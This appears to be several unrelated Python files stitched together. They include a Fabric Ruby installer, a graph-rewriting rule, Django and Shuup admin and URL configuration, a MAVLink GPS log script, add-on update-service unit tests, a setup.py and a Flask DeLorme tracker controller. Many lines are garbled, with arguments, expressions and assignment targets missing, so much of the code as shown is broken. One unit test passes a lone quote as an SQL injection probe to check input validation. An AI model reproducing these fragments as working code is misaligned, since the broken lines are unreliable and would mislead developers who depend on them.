15 values
1 class
2 classes
2 classes
1 class
""" Ruby Blueprint ============== **Fabric environment:** .. code-block:: yaml blueprints: - blues.ruby settings: ruby: gems: # List of ruby gems to install (Optional) # - sass """ from fabric.decorators import task from refabric.api import run, info from refabric.context_managers import sudo from refabric.contrib import blueprints from . import debian __all__ = ['setup', 'configure'] blueprint = blueprints.get(__name__) @task def setup(): """ Install Ruby and configured gems """ install() configure() @task def configure(): """ Install configured gems """ install_gems() def install(): with sudo(): info('Installing Ruby v1.9.3') debian.apt_get('install', 'ruby1.9.3') info('Installing Bundler') gem('install', 'bundler') def install_gems(): gems = blueprint.get('gems', []) if gems: info('Installing Gems') gem('install', *gems) def gem(command, *options): info('Running gem {}', command) with sudo(): run('gem {} {} --no-ri --no-rdoc'.format(command, ' '.join(options)))
from .rule_primitive import RulePrimitive from .messages import TransformationException from core.himesis import Himesis from core.himesis_utils import update_equations from solver.simple_attribute_equation_evaluator import is_consistent import traceback import re class Rewriter(RulePrimitive): ''' Transforms the matched source model elements according to the specified post-condition pattern. ''' def __init__(self, condition): ''' Transforms the bound graph of the source graph into what the specification of the post-condition pattern. @param condition: The the post-condition pattern. ''' super(Rewriter, self).__init__() self.condition = condition def __str__(self): s = super(Rewriter, self).__str__() s = s.split(' ') s.insert(1, '[%s]' % return reduce(lambda x, y: x + ' ' + y, s) def packet_in(self, packet, verbosity = 0): self.exception = None self.is_success = False if self.condition.pre[Himesis.Constants.GUID] not in packet.match_sets: self.is_success = False # TODO: This should be a TransformationLanguageSpecificException self.exception = TransformationException() self.exception.packet = packet return packet else: match = packet.match_sets[self.condition.pre[Himesis.Constants.GUID]].match2rewrite try: mapping = match.to_label_mapping(packet.graph) # Apply the transformation on the match if verbosity > 0: print("Rewriter mapping: " + str(mapping)) graph_eqs = packet.graph["equations"] try: cond_eqs = self.condition["equations"] except KeyError: cond_eqs = [] if cond_eqs and graph_eqs != cond_eqs: #get dict from label to node num RHS_labels = {} for n, node in enumerate(self.condition.vs): if node["MT_label__"] == '': continue RHS_labels[int(node["MT_label__"])] = n new_mapping = {} j=0 vcount = packet.graph.vcount() #make sure to iterate in natural order for label in sorted(RHS_labels.keys()): #use mapping if possible if str(label) in mapping: new_mapping[label] = mapping[str(label)] #assume nodes will be added in this order #TODO: Handle deleted nodes else: new_mapping[label] = vcount + j j += 1 new_cond_eqs = update_equations(cond_eqs, new_mapping) packet.graph["equations"] += new_cond_eqs if not is_consistent(packet.graph): if verbosity >= 2: print("Graph: " + + " has inconsistent equations inside") self.is_success = False return packet self.condition.execute(packet, mapping) # Sets dirty nodes as well except Exception as e: tb = traceback.format_exc() print("Rewriter Error: " + str(e)) print(tb) print("packet.graph: " + print("self.condition: " + #raise self.is_success = False self.exception = TransformationException(e) self.exception.packet = packet self.exception.transformation_unit = self return packet # Remove the match packet.match_sets[self.condition.pre[Himesis.Constants.GUID]].match2rewrite = None if len(packet.match_sets[self.condition.pre[Himesis.Constants.GUID]].matches) == 0: del packet.match_sets[self.condition.pre[Himesis.Constants.GUID]] #print self.condition self.is_success = True return packet
# -*- coding: utf-8 -*- # This file is part of Shuup. # # Copyright (c) 2012-2017, Shoop Commerce Ltd. All rights reserved. # # This source code is licensed under the OSL-3.0 license found in the # LICENSE file in the root directory of this source tree. from __future__ import unicode_literals from django.utils.translation import ugettext_lazy as _ from shuup.admin.base import AdminModule, MenuEntry from import STOREFRONT_MENU_CATEGORY from shuup.admin.utils.permissions import get_default_model_permissions from shuup.admin.utils.urls import ( admin_url, derive_model_url, get_edit_and_list_urls ) from shuup.core.models import ContactGroup class ContactGroupModule(AdminModule): name = _("Contact Groups") breadcrumbs_menu_entry = MenuEntry(name, url="shuup_admin:contact_group.list") def get_urls(self): return [ admin_url( "^contact_group/(?P<pk>\d+)/delete/$", "shuup.admin.modules.contact_groups.views.ContactGroupDeleteView", name="contact_group.delete", permissions=["shuup.delete_contactgroup"], ) ] + get_edit_and_list_urls( url_prefix="^contact_group", view_template="shuup.admin.modules.contact_groups.views.ContactGroup%sView", name_template="contact_group.%s", permissions=get_default_model_permissions(ContactGroup), ) def get_menu_entries(self, request): return [ MenuEntry(, icon="fa fa-asterisk", url="shuup_admin:contact_group.list", category=STOREFRONT_MENU_CATEGORY, subcategory="other_settings", ordering=2 ), ] def get_required_permissions(self): return get_default_model_permissions(ContactGroup) def get_model_url(self, object, kind): return derive_model_url(ContactGroup, "shuup_admin:contact_group", object, kind)
"""webstore URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf import settings from django.conf.urls import include, url from django.conf.urls.static import static from django.contrib import admin from carts.views import CartView, ItemCountView, CheckoutView, CheckoutFinalView from invoice.views import ( AddressSelectFormView, UserAddressCreateView, OrderList, UserCheckoutAPI, OrderDetail ) from products.views import ( APIHomeView, CategoryListAPIView, CategoryRetrieveAPIView, ProductListAPIView, ProductRetrieveAPIView, ) # ========================================================================= # Enabling RESTful architecture with dynamic urls. # Overall url patterns for webstore. # ========================================================================= urlpatterns = [ url(r'^$', 'subscribers.views.home', name='home'), url(r'^about/$', 'webstore.views.about', name='about'), url(r'^admin/',, url(r'^accounts/', include('registration.backends.default.urls')), url(r'^products/', include('products.urls')), url(r'^categories/', include('products.urls_categories')), url(r'^orders/$', OrderList.as_view(), name='orders'), url(r'^orders/(?P<pk>\d+)/$', OrderDetail.as_view(), name='order_detail'), url(r'^cart/$', CartView.as_view(), name='cart'), url(r'^cart/count/$', ItemCountView.as_view(), name='item_count'), url(r'^checkout/$', CheckoutView.as_view(), name='checkout'), url(r'^checkout/address/$', AddressSelectFormView.as_view(), name='checkout_address'), url(r'^checkout/address/add/$', UserAddressCreateView.as_view(), name='user_address_create'), url(r'^checkout/final/$', CheckoutFinalView.as_view(), name='checkout_final'), url(r'^docs/', include('rest_framework_docs.urls')), ] #API Patterns urlpatterns += [ url(r'^api/$', APIHomeView.as_view(), name='home_api'), url(r'^api/auth/token/$', 'rest_framework_jwt.views.obtain_jwt_token'), url(r'^api/auth/token/refresh$', 'rest_framework_jwt.views.refresh_jwt_token'), url(r'^api/categories/$', CategoryListAPIView.as_view(), name='categories_api'), url(r'^api/categories/(?P<pk>\d+)/$', CategoryRetrieveAPIView.as_view(), name='category_detail_api'), url(r'^api/products/$', ProductListAPIView.as_view(), name='products_api'), url(r'^api/products/(?P<pk>\d+)/$', ProductRetrieveAPIView.as_view(), name='product_detail_api'), url(r'^api/user/checkout/$', UserCheckoutAPI.as_view(), name='user_checkout_api'), ] if settings.DEBUG: urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
#!/usr/bin/env python ''' show GPS lock events in a MAVLink log ''' import sys, time, os from argparse import ArgumentParser parser = ArgumentParser(description=__doc__) parser.add_argument("--condition", default=None, help="condition for packets") parser.add_argument("logs", metavar="LOG", nargs="+") args = parser.parse_args() from pymavlink import mavutil def lock_time(logfile): '''work out gps lock times for a log file''' print("Processing log %s" % filename) mlog = mavutil.mavlink_connection(filename) locked = False start_time = 0.0 total_time = 0.0 t = None m = mlog.recv_match(type=['GPS_RAW_INT','GPS_RAW'], condition=args.condition) if m is None: return 0 unlock_time = time.mktime(time.localtime(m._timestamp)) while True: m = mlog.recv_match(type=['GPS_RAW_INT','GPS_RAW'], condition=args.condition) if m is None: if locked: total_time += time.mktime(t) - start_time if total_time > 0: print("Lock time : %u:%02u" % (int(total_time)/60, int(total_time)%60)) return total_time t = time.localtime(m._timestamp) if m.fix_type >= 2 and not locked: print("Locked at %s after %u seconds" % (time.asctime(t), time.mktime(t) - unlock_time)) locked = True start_time = time.mktime(t) elif m.fix_type == 1 and locked: print("Lost GPS lock at %s" % time.asctime(t)) locked = False total_time += time.mktime(t) - start_time unlock_time = time.mktime(t) elif m.fix_type == 0 and locked: print("Lost protocol lock at %s" % time.asctime(t)) locked = False total_time += time.mktime(t) - start_time unlock_time = time.mktime(t) return total_time total = 0.0 for filename in args.logs: total += lock_time(filename) print("Total time locked: %u:%02u" % (int(total)/60, int(total)%60))
# -*- coding: utf-8 -*- import json from unittest import mock from datetime import datetime, timedelta from email import utils from django.db import connection from services import update from olympia import amo from olympia.addons.models import ( Addon, CompatOverride, CompatOverrideRange, IncompatibleVersions) from olympia.amo.tests import TestCase from olympia.applications.models import AppVersion from olympia.files.models import File from olympia.versions.models import ApplicationsVersions, Version class VersionCheckMixin(object): def get_update_instance(self, data): instance = update.Update(data) instance.cursor = connection.cursor() return instance class TestDataValidate(VersionCheckMixin, TestCase): fixtures = ['base/addon_3615', 'base/appversion'] def setUp(self): super(TestDataValidate, self).setUp() = { 'id': '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}', 'version': '2.0.58', 'reqVersion': 1, 'appID': '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}', 'appVersion': '3.7a1pre', } def test_app_os(self): data = data['appOS'] = 'something %s penguin' % amo.PLATFORM_LINUX.api_name instance = self.get_update_instance(data) assert instance.is_valid() assert['appOS'] == def test_app_version_fails(self): data = del data['appID'] instance = self.get_update_instance(data) assert not instance.is_valid() def test_app_version_wrong(self): data = data['appVersion'] = '67.7' instance = self.get_update_instance(data) # If you pass through the wrong version that's fine # you will just end up with no updates because your # version_int will be out. assert instance.is_valid() def test_app_version(self): data = instance = self.get_update_instance(data) assert instance.is_valid() assert['version_int'] == 3070000001000 def test_sql_injection(self): data = data['id'] = "'" instance = self.get_update_instance(data) assert not instance.is_valid() def test_inactive(self): addon = Addon.objects.get(pk=3615) addon.update(disabled_by_user=True) instance = self.get_update_instance( assert not instance.is_valid() def test_soft_deleted(self): addon = Addon.objects.get(pk=3615) addon.update(status=amo.STATUS_DELETED) instance = self.get_update_instance( assert not instance.is_valid() def test_disabled(self): addon = Addon.objects.get(pk=3615) addon.update(status=amo.STATUS_DISABLED) instance = self.get_update_instance( assert not instance.is_valid() def test_no_version(self): data = del data['version'] instance = self.get_update_instance(data) assert instance.is_valid() def test_unlisted_addon(self): """Add-ons with only unlisted versions are valid, they just don't receive any updates (See TestLookinstance.test_no_unlisted below).""" addon = Addon.objects.get(pk=3615) self.make_addon_unlisted(addon) instance = self.get_update_instance( assert instance.is_valid() class TestLookup(VersionCheckMixin, TestCase): fixtures = ['addons/update', 'base/appversion'] def setUp(self): super(TestLookup, self).setUp() self.addon = Addon.objects.get(id=1865) self.platform = None self.version_int = 3069900200100 = amo.APP_IDS[1] self.version_1_0_2 = 66463 self.version_1_1_3 = 90149 self.version_1_2_0 = 105387 self.version_1_2_1 = 112396 self.version_1_2_2 = 115509 def get_update_instance(self, *args): data = { 'id': self.addon.guid, 'appID': args[2].guid, 'appVersion': 1, # this is going to be overridden 'appOS': args[3].api_name if args[3] else '', 'reqVersion': '', } # Allow version to be optional. if args[0]: data['version'] = args[0] instance = super(TestLookup, self).get_update_instance(data) assert instance.is_valid()['version_int'] = args[1] instance.get_update() return (['row'].get('version_id'),['row'].get('file_id')) def change_status(self, version, status): version = Version.objects.get(pk=version) file = version.files.all()[0] file.status = status return version def change_version(self, version, name): Version.objects.get(pk=version).update(version=name) def test_low_client(self): """ Version 3.0a1 of Firefox is 3000000001100 and version 1.0.2 of the add-on is returned. """ version, file = self.get_update_instance( '', '3000000001100',, self.platform) assert version == self.version_1_0_2 def test_new_client(self): """ Version 3.0.12 of Firefox is 3069900200100 and version 1.2.2 of the add-on is returned. """ version, file = self.get_update_instance( '', self.version_int,, self.platform) assert version == self.version_1_2_2 def test_min_client(self): """ Version 3.7a5pre of Firefox is 3070000005000 and version 1.1.3 of the add-on is returned, because all later ones are set to minimum version of 3.7a5. """ for version in Version.objects.filter(pk__gte=self.version_1_2_0): appversion = version.apps.all()[0] appversion.min = AppVersion.objects.get(pk=325) # 3.7a5 version, file = self.get_update_instance( '', '3070000005000',, self.platform) # 3.7a5pre assert version == self.version_1_1_3 def test_new_client_ordering(self): """ Given the following: * Version 15 (1 day old), max application_version 3.6* * Version 12 (1 month old), max application_version 3.7a We want version 15, even though version 12 is for a higher version. This was found in """ application_version = ApplicationsVersions.objects.get(pk=77550) application_version.max_id = 350 # Version 1.2.2 is now a lower max version. application_version = ApplicationsVersions.objects.get(pk=88490) application_version.max_id = 329 version, file = self.get_update_instance( '', self.version_int,, self.platform) assert version == self.version_1_2_2 def test_public(self): """ If the addon status is public then you get a public version. """ self.change_status(self.version_1_2_2, amo.STATUS_PENDING) self.addon.reload() assert self.addon.status == amo.STATUS_APPROVED version, file = self.get_update_instance( '1.2', self.version_int,, self.platform) assert version == self.version_1_2_1 def test_no_unlisted(self): """ Unlisted versions are always ignored, never served as updates. """ Version.objects.get(pk=self.version_1_2_2).update( channel=amo.RELEASE_CHANNEL_UNLISTED) self.addon.reload() assert self.addon.status == amo.STATUS_APPROVED version, file = self.get_update_instance( '1.2', self.version_int,, self.platform) assert version == self.version_1_2_1 def test_can_downgrade(self): """ Check that we can downgrade, if 1.2.0 gets admin disabled and the oldest public version is now 1.1.3. """ self.change_status(self.version_1_2_0, amo.STATUS_PENDING) for v in Version.objects.filter(pk__gte=self.version_1_2_1): v.delete() version, file = self.get_update_instance( '1.2', self.version_int,, self.platform) assert version == self.version_1_1_3 def test_public_pending_exists(self): """ If the addon status is public and you are asking for a beta version we look up a version based on the file version at that point. In this case, because the file is pending, we are looking for something public. """ self.change_status(self.version_1_2_2, amo.STATUS_PENDING) self.change_status(self.version_1_2_0, amo.STATUS_PENDING) self.change_version(self.version_1_2_0, '1.2beta') version, file = self.get_update_instance( '1.2', self.version_int,, self.platform) assert version == self.version_1_2_1 def test_public_pending_no_file_beta(self): """ If the addon status is public and you are asking for a beta version we look up a version based on the file version at that point. If there are no files, find a public version. """ self.change_version(self.version_1_2_0, '1.2beta') Version.objects.get(pk=self.version_1_2_0).files.all().delete() version, file = self.get_update_instance( '1.2beta', self.version_int,, self.platform) dest = Version.objects.get(pk=self.version_1_2_2) assert dest.addon.status == amo.STATUS_APPROVED assert dest.files.all()[0].status == amo.STATUS_APPROVED assert version == def test_not_public(self): """ If the addon status is not public, then the update only looks for files within that one version. """ self.change_status(self.version_1_2_2, amo.STATUS_NULL) self.addon.update(status=amo.STATUS_NULL) version, file = self.get_update_instance( '1.2.1', self.version_int,, self.platform) assert version == self.version_1_2_1 def test_platform_does_not_exist(self): """If client passes a platform, find that specific platform.""" version = Version.objects.get(pk=115509) for file in version.files.all(): file.platform = version, file = self.get_update_instance( '1.2', self.version_int,, self.platform) assert version == self.version_1_2_1 def test_platform_exists(self): """If client passes a platform, find that specific platform.""" version = Version.objects.get(pk=115509) for file in version.files.all(): file.platform = version, file = self.get_update_instance( '1.2', self.version_int,, amo.PLATFORM_LINUX) assert version == self.version_1_2_2 def test_file_for_platform(self): """If client passes a platform, make sure we get the right file.""" version = Version.objects.get(pk=self.version_1_2_2) file_one = version.files.all()[0] file_one.platform = file_two = File(version=version, filename='foo', hash='bar',, status=amo.STATUS_APPROVED) version, file = self.get_update_instance( '1.2', self.version_int,, amo.PLATFORM_LINUX) assert version == self.version_1_2_2 assert file == version, file = self.get_update_instance( '1.2', self.version_int,, amo.PLATFORM_WIN) assert version == self.version_1_2_2 assert file == class TestDefaultToCompat(VersionCheckMixin, TestCase): """ Test default to compatible with all the various combinations of input. """ fixtures = ['addons/default-to-compat'] def setUp(self): super(TestDefaultToCompat, self).setUp() self.addon = Addon.objects.get(id=337203) self.platform = None = amo.APP_IDS[1] self.app_version_int_3_0 = 3000000200100 self.app_version_int_4_0 = 4000000200100 self.app_version_int_5_0 = 5000000200100 self.app_version_int_6_0 = 6000000200100 self.app_version_int_7_0 = 7000000200100 self.app_version_int_8_0 = 8000000200100 self.ver_1_0 = 1268881 self.ver_1_1 = 1268882 self.ver_1_2 = 1268883 self.ver_1_3 = 1268884 self.expected = { '3.0-strict': None, '3.0-normal': None, '3.0-ignore': None, '4.0-strict': self.ver_1_0, '4.0-normal': self.ver_1_0, '4.0-ignore': self.ver_1_0, '5.0-strict': self.ver_1_2, '5.0-normal': self.ver_1_2, '5.0-ignore': self.ver_1_2, '6.0-strict': self.ver_1_3, '6.0-normal': self.ver_1_3, '6.0-ignore': self.ver_1_3, '7.0-strict': self.ver_1_3, '7.0-normal': self.ver_1_3, '7.0-ignore': self.ver_1_3, '8.0-strict': None, '8.0-normal': self.ver_1_3, '8.0-ignore': self.ver_1_3, } def create_override(self, **kw): co = CompatOverride.objects.create( name='test', guid=self.addon.guid, addon=self.addon ) default = dict(compat=co,, min_version='0', max_version='*', min_app_version='0', max_app_version='*') default.update(kw) CompatOverrideRange.objects.create(**default) def update_files(self, **kw): for version in self.addon.versions.all(): for file in version.files.all(): file.update(**kw) def get_update_instance(self, **kw): instance = super(TestDefaultToCompat, self).get_update_instance({ 'reqVersion': 1, 'id': self.addon.guid, 'version': kw.get('item_version', '1.0'), 'appID':, 'appVersion': kw.get('app_version', '3.0'), }) assert instance.is_valid() instance.compat_mode = kw.get('compat_mode', 'strict') instance.get_update() return['row'].get('version_id') def check(self, expected): """ Checks Firefox versions 3.0 to 8.0 in each compat mode and compares it to the expected version. """ versions = ['3.0', '4.0', '5.0', '6.0', '7.0', '8.0'] modes = ['strict', 'normal', 'ignore'] for version in versions: for mode in modes: assert ( self.get_update_instance( app_version=version, compat_mode=mode) == expected['-'.join([version, mode])] ) def test_application(self): # Basic test making sure application() is returning the output of # Update.get_output(). Have to mock Update(): otherwise, the real # database would be hit, not the test one, because of how services # use a different setting and database connection APIs. environ = { 'QUERY_STRING': '' } self.start_response_call_count = 0 expected_headers = [ ('FakeHeader', 'FakeHeaderValue') ] expected_output = b'{"fake": "output"}' def start_response_inspector(status, headers): self.start_response_call_count += 1 assert status == '200 OK' assert headers == expected_headers with mock.patch('services.update.Update') as UpdateMock: update_instance = UpdateMock.return_value update_instance.get_headers.return_value = expected_headers update_instance.get_output.return_value = expected_output output = update.application(environ, start_response_inspector) assert self.start_response_call_count == 1 # Output is an array with a single string containing the body of the # response. assert output == [expected_output] def test_baseline(self): # Tests simple add-on (non-binary-components, non-strict). self.check(self.expected) def test_binary_components(self): # Tests add-on with binary_components flag. self.update_files(binary_components=True) self.expected.update({ '8.0-normal': None, }) self.check(self.expected) def test_extension_compat_override(self): # Tests simple add-on (non-binary-components, non-strict) with a compat # override. self.create_override(min_version='1.3', max_version='1.3') self.expected.update({ '6.0-normal': self.ver_1_2, '7.0-normal': self.ver_1_2, '8.0-normal': self.ver_1_2, }) self.check(self.expected) def test_binary_component_compat_override(self): # Tests simple add-on (non-binary-components, non-strict) with a compat # override. self.update_files(binary_components=True) self.create_override(min_version='1.3', max_version='1.3') self.expected.update({ '6.0-normal': self.ver_1_2, '7.0-normal': self.ver_1_2, '8.0-normal': None, }) self.check(self.expected) def test_strict_opt_in(self): # Tests add-on with opt-in strict compatibility self.update_files(strict_compatibility=True) self.expected.update({ '8.0-normal': None, }) self.check(self.expected) def test_compat_override_max_addon_wildcard(self): # Tests simple add-on (non-binary-components, non-strict) with a compat # override that contains a max wildcard. self.create_override(min_version='1.2', max_version='1.3', min_app_version='5.0', max_app_version='6.*') self.expected.update({ '5.0-normal': self.ver_1_1, '6.0-normal': self.ver_1_1, }) self.check(self.expected) def test_compat_override_max_app_wildcard(self): # Tests simple add-on (non-binary-components, non-strict) with a compat # override that contains a min/max wildcard for the app. self.create_override(min_version='1.2', max_version='1.3') self.expected.update({ '5.0-normal': self.ver_1_1, '6.0-normal': self.ver_1_1, '7.0-normal': self.ver_1_1, '8.0-normal': self.ver_1_1, }) self.check(self.expected) def test_compat_override_both_wildcards(self): # Tests simple add-on (non-binary-components, non-strict) with a compat # override that contains a wildcard for both addon version and app # version. self.create_override(min_app_version='7.0', max_app_version='*') self.expected.update({ '7.0-normal': None, '8.0-normal': None, }) self.check(self.expected) def test_compat_override_invalid_version(self): # Tests compat override range where version doesn't match our # versioning scheme. This results in no versions being written to the # incompatible_versions table. self.create_override(min_version='ver1', max_version='ver2') assert IncompatibleVersions.objects.all().count() == 0 def test_min_max_version(self): # Tests the minimum requirement of the app maxVersion. av = self.addon.current_version.apps.all()[0] av.min_id = 233 # Firefox 3.0. av.max_id = 268 # Firefox 3.5. self.expected.update({ '3.0-strict': self.ver_1_3, '3.0-ignore': self.ver_1_3, '4.0-ignore': self.ver_1_3, '5.0-ignore': self.ver_1_3, '6.0-strict': self.ver_1_2, '6.0-normal': self.ver_1_2, '7.0-strict': self.ver_1_2, '7.0-normal': self.ver_1_2, '8.0-normal': self.ver_1_2, }) self.check(self.expected) class TestResponse(VersionCheckMixin, TestCase): fixtures = ['base/addon_3615'] def setUp(self): super(TestResponse, self).setUp() self.addon_one = Addon.objects.get(pk=3615) = { 'id': '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}', 'version': '2.0.58', 'reqVersion': 1, 'appID': '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}', 'appVersion': '3.7a1pre', } self.mac = amo.PLATFORM_MAC = amo.PLATFORM_WIN def test_bad_guid(self):['id'] = 'garbage' instance = self.get_update_instance( assert json.loads(instance.get_output()) == instance.get_error_output() def test_no_platform(self): file = File.objects.get(pk=67442) file.platform = data = data['appOS'] = instance = self.get_update_instance(data) assert instance.get_output() assert['row']['file_id'] == data['appOS'] = self.mac.api_name instance = self.get_update_instance(data) assert ( json.loads(instance.get_output()) == instance.get_no_updates_output()) def test_different_platform(self): file = File.objects.get(pk=67442) file.platform = file_pk = = None file.platform = mac_file_pk = data = data['appOS'] = instance = self.get_update_instance(data) instance.is_valid() instance.get_update() assert['row']['file_id'] == file_pk data['appOS'] = self.mac.api_name instance = self.get_update_instance(data) instance.is_valid() instance.get_update() assert['row']['file_id'] == mac_file_pk def test_good_version(self): instance = self.get_update_instance( instance.is_valid() instance.get_update() assert['row']['hash'].startswith('sha256:3808b13e') assert['row']['min'] == '2.0' assert['row']['max'] == '4.0' def test_no_app_version(self): data = data['appVersion'] = '1.4' instance = self.get_update_instance(data) instance.is_valid() assert not instance.get_update() def test_low_app_version(self): data = data['appVersion'] = '2.0' instance = self.get_update_instance(data) instance.is_valid() instance.get_update() assert['row']['hash'].startswith('sha256:3808b13e') assert['row']['min'] == '2.0' assert['row']['max'] == '4.0' def test_content_type(self): instance = self.get_update_instance( ('Content-Type', 'text/xml') in instance.get_headers(1) def test_cache_control(self): instance = self.get_update_instance( ('Cache-Control', 'public, max-age=3600') in instance.get_headers(1) def test_length(self): instance = self.get_update_instance( ('Cache-Length', '1') in instance.get_headers(1) def test_expires(self): """Check there are these headers and that expires is 3600 later.""" # We aren't bother going to test the actual time in expires, that # way lies pain with broken tests later. instance = self.get_update_instance( headers = dict(instance.get_headers(1)) last_modified = datetime( *utils.parsedate_tz(headers['Last-Modified'])[:7]) expires = datetime(*utils.parsedate_tz(headers['Expires'])[:7]) assert (expires - last_modified).seconds == 3600 def get_file_url(self): """Return the file url with the hash as parameter.""" return ( 'http://testserver/user-media/addons/3615/' 'delicious_bookmarks-2.1.072-fx.xpi?' 'filehash=sha256%3A3808b13ef8341378b9c8305ca648200954ee7dcd8dc' 'e09fef55f2673458bc31f') def test_url(self): instance = self.get_update_instance( instance.get_output() assert['row']['url'] == self.get_file_url() def test_url_local_recent(self): a_bit_ago = - timedelta(seconds=60) File.objects.get(pk=67442).update(datestatuschanged=a_bit_ago) instance = self.get_update_instance( instance.get_output() assert['row']['url'] == self.get_file_url() def test_hash(self): content = self.get_update_instance( data = json.loads(content) file = File.objects.get(pk=67442) guid = '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}' assert data['addons'][guid]['updates'][0]['update_hash'] == file.hash file = File.objects.get(pk=67442) file.hash = '' content = self.get_update_instance( data = json.loads(content) assert 'update_hash' not in data['addons'][guid]['updates'][0] def test_release_notes(self): content = self.get_update_instance( data = json.loads(content) guid = '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}' assert data['addons'][guid]['updates'][0]['update_info_url'] version = Version.objects.get(pk=81551) version.update(release_notes=None) content = self.get_update_instance( data = json.loads(content) assert 'update_info_url' not in data['addons'][guid]['updates'][0] def test_no_updates_at_all(self): self.addon_one.versions.all().delete() instance = self.get_update_instance( assert ( json.loads(instance.get_output()) == instance.get_no_updates_output()) def test_no_updates_my_fx(self): data = data['appVersion'] = '5.0.1' instance = self.get_update_instance(data) assert ( json.loads(instance.get_output()) == instance.get_no_updates_output())
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright © 2013 by its contributors. See AUTHORS for details. # Distributed under the MIT/X11 software license, see the accompanying # file LICENSE or from distutils.core import setup from dj_user import get_version # Compile the list of packages available, because distutils doesn't have an # easy way to do this. import os packages, data_files = [], [] root_dir = os.path.dirname(__file__) if root_dir: os.chdir(root_dir) for dirpath, dirnames, filenames in os.walk('dj_user'): # Ignore dirnames that start with '.' for i, dirname in enumerate(dirnames): if dirname.startswith('.'): del dirnames[i] if '' in filenames: pkg = dirpath.replace(os.path.sep, '.') if os.path.altsep: pkg = pkg.replace(os.path.altsep, '.') packages.append(pkg) elif filenames: # Strip “dj_user/” or “dj_user\”: prefix = dirpath[len('dj_user')+1:] for f in filenames: data_files.append(os.path.join(prefix, f)) version = get_version().replace(' ', '-') setup(name='dj-user', version=version, description=( u"Provides batteries-included backends for django.contrib.auth and " u"django-registration."), author='Mark Friedenbach', author_email='', url='', download_url='' % version, package_dir={'dj_user': 'dj_user'}, packages=packages, package_data={'dj_user': data_files}, classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Software Development :: Libraries :: Python Modules', ], install_requires=( 'Django>=1.5', 'django-crispy-forms>=1.4.0', 'django-registration>=1.0', ), )
""" Initialize adventure delorme controller """ import logging import urllib.request, urllib.error, urllib.parse import datetime from pykml import parser from flask import Blueprint, abort, request, jsonify from werkzeug.exceptions import BadRequest from app.decorators import crossdomain from app.views.auth import OAUTH from app.models.adventure import Adventure from app.models.delorme import Delorme from app.models.point import Point MOD_DELORME = Blueprint('delorme', __name__, url_prefix='/api/v1/adventure/<slug>/delorme') def load_data(feed_url, adventure): """Load DeLorme inReach data from specified feed URL.""" obj = urllib.request.urlopen(feed_url) root = parser.parse(obj).getroot() for placemark in root.Document.Folder.Placemark: try: point = None extended_data = placemark.ExtendedData.Data delorme_id = None event = None altitude = None velocity = None course = None text = None desc = None point_type = 'tracker' for data in extended_data: if data.attrib['name'] == 'Id': delorme_id = int(data.value.text) elif data.attrib['name'] == 'Event': event = data.value.text.encode('utf-8') elif data.attrib['name'] == 'Elevation': altitude = data.value.text.encode('utf-8') elif data.attrib['name'] == 'Velocity': velocity = data.value.text.encode('utf-8') elif data.attrib['name'] == 'Course': course = data.value.text.encode('utf-8') elif data.attrib['name'] == 'Text': text = data.value.text if text is not None: text = text.encode('utf-8') if delorme_id is not None: point = adventure.points.filter( \ point_type=point_type, delorme_id=delorme_id \ ).first() if point is None: title = event coordinates = placemark.Point.coordinates.text.split(',') latitude = float(coordinates[1]) longitude = float(coordinates[0]) timestamp = datetime.datetime.strptime( \ placemark.TimeStamp.when.text, "%Y-%m-%dT%H:%M:%SZ" \ ) if text is not None: desc = text point_type = 'message' point = Point( title=title, desc=desc, altitude=altitude, speed=velocity, direction=course, latitude=latitude, longitude=longitude, resource=None, point_type=point_type, timestamp=timestamp, delorme_id=delorme_id, aio_id=None, hide=False, thumb=None, photo=None, video=None, battery=None, source='delorme', user=None ) adventure.points.append(point) except AttributeError as err: if 'no such child' not in err.message: logging.error(err) return abort(500) return jsonify({'status': 'ok'}) @MOD_DELORME.route('/', methods=['POST']) @crossdomain(origin='*') @OAUTH.require_oauth('email') def add_delorme(slug): """Add Delorme inReach feed URL to Adventure object defined by slug""" try: adventure = Adventure.objects.get(slug=slug) feed_url = request.values.get('feed_url', None) adventure.delorme = Delorme( feed_url=feed_url ) return jsonify({'delorme': adventure.delorme.to_dict()}) except TypeError as err: logging.error(err) abort(400) except BadRequest: abort(400) return @MOD_DELORME.route('/', methods=['GET']) @crossdomain(origin='*') @OAUTH.require_oauth('email') def get_delorme(slug): """Get Delorme inReach information.""" try: adventure = Adventure.objects.get(slug=slug) if adventure.delorme: return jsonify({'delorme': adventure.delorme.to_dict()}) return jsonify({'error': 'DeLorme inReach information is not configured.'}), 400 except TypeError as err: logging.error(err) abort(400) except BadRequest: abort(400) return @MOD_DELORME.route('/', methods=['DELETE']) @crossdomain(origin='*') @OAUTH.require_oauth('email') def delete_point(slug): """Delete DeLorme inReach information.""" Adventure.objects(slug=slug).update(unset__delorme=1, upsert=True) return jsonify({'status': 'ok'}) @MOD_DELORME.route('/load', methods=['GET']) @OAUTH.require_oauth('email') def load_tracker(slug): """Load DeLorme inReach tracker points from configured feed URL.""" adventure = Adventure.objects(slug=slug).get() delorme = adventure.delorme if delorme.feed_url is not None: return load_data(delorme.feed_url, adventure) return jsonify({'error': 'DeLorme inReach information is not set.'}), 400
